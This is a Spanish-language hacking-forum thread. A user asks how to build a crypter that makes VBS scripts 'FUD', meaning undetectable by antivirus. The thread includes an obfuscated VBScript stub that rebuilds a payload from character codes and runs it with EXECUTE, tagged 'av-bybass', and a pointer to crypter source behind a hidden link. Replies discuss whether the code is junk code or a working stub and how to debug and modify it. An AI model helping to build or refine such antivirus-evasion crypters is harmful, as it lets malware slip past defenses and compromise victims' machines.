Jump to content
YOUR-AD-HERE
HOSTING
TOOLS
992Proxy
  • 0

Locked Como crear?


Not System

Question

4 answers to this question

Recommended Posts

  • 0

Re: Como crear?

 

Como creo un crypter para hacer fud los VBS ;

 

Yo tengo conceptos basicos/medios de vb6 & vb.net..

si me ayudan se los agradeceria!!!!

 

 

Gracias a todo level-23

 

hola, aqui tienes un source para verlo "AFHJQ-vbs-Crypter VB-Net"

This is the hidden content, please

Link to comment
Share on other sites

  • 0

Re: Como crear?

 

Otra pregunta que no entiendo squo es como funciona esta parte del codigo ; si me la explicas te la agradeceria mucho

 

 

DIM DF

DE = CHRW(10 + 4) + CHRW(10 + 4) + CHRW(10 + 4)

IF DE = CHRW(10 + 4) + CHRW(10 + 4) + CHRW(10 + 4) THEN

MOHMRET = "%do%"

END IF

mohar = MOHMRET

IF DE = CHRW(10 + 4) + CHRW(10 + 4) + CHRW(10 + 4) THEN

MOHMRT = SPLIT(mohar,CHRW(10 + 4))

END IF

IF DE = CHRW(10 + 4) + CHRW(10 + 4) + CHRW(10 + 4) THEN

tu = UBOUND(MOHMRT) + ( - CHRW(49))

FOR M = CHRW(48) TO tu

DIM SD

SD = dr(MOHMRT(M))

GFT = "gtgtgtgtgtfltgttgerg"

FLAMI = FLAMI + SD

NEXT

DIM CEDRFR

EXECUTE (FLAMI)

CEDRFR = CHRW(10 + 4) + CHRW(10 + 4) + CHRW(10 + 4) + "av-bybass"

END IF

function dr(nu)

sr = CHRW(nu)

dr = sr

END FUNCTION

Link to comment
Share on other sites

  • 0

Re: Como crear?

 

Amigo lo que tus ojos ven es lo que es, me explico y si estoy equivocado que me lo digan, abria que ver el código, pero para mis ojos eso se llama junkcode, que significa código basura, en principio se utiliza para despistar al enemigo, o lo que es lo mismo engañar al AV para bajar detecciones.

Si es que lo estoy viendo yo el código y me esta engañando jajajajaja,porque no tiene ningun sentido lo que pone,creeme es código basura.

@R3spaldo

Link to comment
Share on other sites

  • 0

Re: Como crear?

 

Amigo lo que tus ojos ven es lo que es, me explico y si estoy equivocado que me lo digan, abria que ver el código, pero para mis ojos eso se llama junkcode, que significa código basura, en principio se utiliza para despistar al enemigo, o lo que es lo mismo engañar al AV para bajar detecciones.

Si es que lo estoy viendo yo el código y me esta engañando jajajajaja,porque no tiene ningun sentido lo que pone,creeme es código basura.

@R3spaldo

 

 

XD tu respuesta es peor que el codigo lol ; no mentira bueno cuestion es como una ecuacion o no se pero no tengo idea de cmo modificarlo para hacerlo FUD ; quiero hacer un crypter para encryptar los .VBS ; pero no logro encontrar ni una base que comprenda ; yo se comprender codigos pero eso no lo logro hacer andar...

Link to comment
Share on other sites

  • 0

Re: Como crear?

 

Amigo lo que tus ojos ven es lo que es, me explico y si estoy equivocado que me lo digan, abria que ver el código, pero para mis ojos eso se llama junkcode, que significa código basura, en principio se utiliza para despistar al enemigo, o lo que es lo mismo engañar al AV para bajar detecciones.

Si es que lo estoy viendo yo el código y me esta engañando jajajajaja,porque no tiene ningun sentido lo que pone,creeme es código basura.

@R3spaldo

 

No necesariamente es basura, por lo que veo es prácticamente el stub, si fuese junk estaria lleno de bucles y/o declaraciones sin sentido, pero si le das seguimiento a las variables y sus valores (velo como pseudo) le encuentras lógica. Si no se entiende es porque esta obfuscado.

 

Para saber que es lo que hace y poder modificarlo, lo que yo haría es ir "debuggeando" cada parte (con msgbox o algo así).

 

Saludos.

Link to comment
Share on other sites

Guest
This topic is now closed to further replies.
×
×
  • Create New...

Important Information

We have placed cookies on your device to help make this website better. You can adjust your cookie settings, otherwise we'll assume you're okay to continue.